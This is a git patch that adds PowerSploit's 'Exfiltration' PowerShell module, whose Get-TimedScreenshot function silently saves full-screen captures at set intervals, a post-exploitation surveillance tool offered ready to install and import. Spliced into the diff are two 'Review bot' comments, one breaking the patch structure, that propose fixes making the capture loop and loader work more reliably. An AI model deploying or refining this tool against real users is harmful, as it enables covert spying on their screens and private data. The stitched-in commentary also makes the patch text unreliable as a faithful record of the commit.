From b3bbe03e939f300c07169650b342e0665e578085 Mon Sep 17 00:00:00 2001
From: bitform
Date: Sun, 20 Jan 2013 21:32:41 -0500
Subject: Added 'Exfiltration' Module
---
Exfiltration/Exfiltration.psd1 | 87 +++++++++++++++++++++++++++++++
Exfiltration/Exfiltration.psm1 | 1 +
Exfiltration/Get-TimedScreenshot.ps1 | 99 ++++++++++++++++++++++++++++++++++++
Exfiltration/Usage.md | 12 +++++
4 files changed, 199 insertions(+)
create mode 100644 Exfiltration/Exfiltration.psd1
create mode 100644 Exfiltration/Exfiltration.psm1
create mode 100644 Exfiltration/Get-TimedScreenshot.ps1
create mode 100644 Exfiltration/Usage.md
(limited to 'Exfiltration')
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
new file mode 100644
index 0000000..7eb9aa2
--- /dev/null
+++ b/Exfiltration/Exfiltration.psd1
@@ -0,0 +1,87 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Exfiltration.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Exfiltration Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
+
+# List of all files packaged with this module
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Exfiltration/Exfiltration.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file
diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1
new file mode 100644
index 0000000..3a19a7d
--- /dev/null
+++ b/Exfiltration/Get-TimedScreenshot.ps1
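Review bot: In Exfiltration.psm1 the loader dot-sources every `*.ps1` it finds under `$PSScriptRoot`, so any script that ends up in the module folder runs in the caller's session at `Import-Module`, whether or not it appears in the manifest's `FileList` (which, as far as I know, is an inventory and is not enforced). Naming the shipped file explicitly, `. (Join-Path $PSScriptRoot 'Get-TimedScreenshot.ps1')`, keeps the import to what this commit adds. The manifest has the same looseness in `FunctionsToExport = '*'`; `FunctionsToExport = 'Get-TimedScreenshot'` would state the public surface and make later additions visible in review.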
@@ -0,0 +1,99 @@
+Function Get-TimedScreenshot {
+<#
+.SYNOPSIS
+
+ Get-TimedScreenshot
+
+ Author: Chris Campbell (@obscuresec)
+ License: BSD 3-Clause
+
+.DESCRIPTION
+
+ A function that takes screenshots and saves them to a folder.
+
+.PARAMETER $Path
+
+ Specifies the folder path.
+
+.PARAMETER $Interval
+
+ Specifies the interval in seconds between taking screenshots.
+
+.PARAMETER $EndTime
+
+ Specifies when the script should stop running in the format HH-MM
+
+.EXAMPLE
+
+ PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
+
+.LINK
+
+ http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
+ https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
+
+#>
+
+ [CmdletBinding()] Param(
+ [Parameter(Mandatory=$True)]
+ [ValidateScript({Test-Path -Path $_ })]
+ [string] $Path,
+
+ [Parameter(Mandatory=$True)]
+ [int32] $Interval,
+
+ [Parameter(Mandatory=$True)]
+ [string] $EndTime
+ )
+
+ #Define helper function that generates and saves screenshot
+ Function GenScreenshot {
+ $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
+ $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
+ $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
+ $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
+ $DrawingGraphics.Dispose()
+ $ScreenshotObject.Save($FilePath)
+ $ScreenshotObject.Dispose()
+ }
+
+ Try {
+
+ #load required assembly
+ Add-Type -Assembly System.Windows.Forms
+
+ Do {
+ #get the current time and build the filename from it
+ $Time = (Get-Date)
+
+ [string] $FileName = "$($Time.Month)"
+ $FileName += '-'
+ $FileName += "$($Time.Day)"
+ $FileName += '-'
+ $FileName += "$($Time.Year)"
+ $FileName += '-'
+ $FileName += "$($Time.Hour)"
+ $FileName += '-'
+ $FileName += "$($Time.Minute)"
+ $FileName += '-'
+ $FileName += "$($Time.Second)"
+ $FileName += '.png'
+
+ #use join-path to add path to filename
+ [string] $FilePath = (Join-Path $Path $FileName)
+
+ #run screenshot function
+ GenScreenshot
+
+ Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
+
+ Start-Sleep -Seconds $Interval
+ }
+
+ #note that this will run once regardless if the specified time as passed
+ While ((Get-Date -Format HH:%m) -lt $EndTime)
+ }
+
+ Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
+
+}
\ No newline at end of file
diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md
new file mode 100644
index 0000000..dfdaabb
--- /dev/null
+++ b/Exfiltration/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Exfiltration`
+
+To see the commands imported, type `Get-Command -Module Exfiltration`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file
-- cgit v1.2.3
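Review bot: In Get-TimedScreenshot.ps1 the loop test `While ((Get-Date -Format HH:%m) -lt $EndTime)` compares strings, and `%m` prints the minute without a leading zero, so the capture does not stop when the help text says it will. With `-EndTime 14:30` the value `14:5` already sorts after `14:30`, and an end time typed as `9:00` is never reached, which leaves the loop writing screen contents to `$Path` until the process is killed. Parse the stop time once before `Do`, for example `$StopAt = [datetime]::ParseExact($EndTime, 'HH:mm', [Globalization.CultureInfo]::InvariantCulture)`, and loop on `While ((Get-Date) -lt $StopAt)`; the help should then give the format as `HH:mm` rather than `HH-MM`. The `Catch` message is also wrong, because inside double quotes `$Error[0].ToString()` expands the whole `$Error` collection followed by literal text; `Write-Warning "$($_.Exception.Message) $($_.InvocationInfo.PositionMessage)"` reports the error that was actually caught.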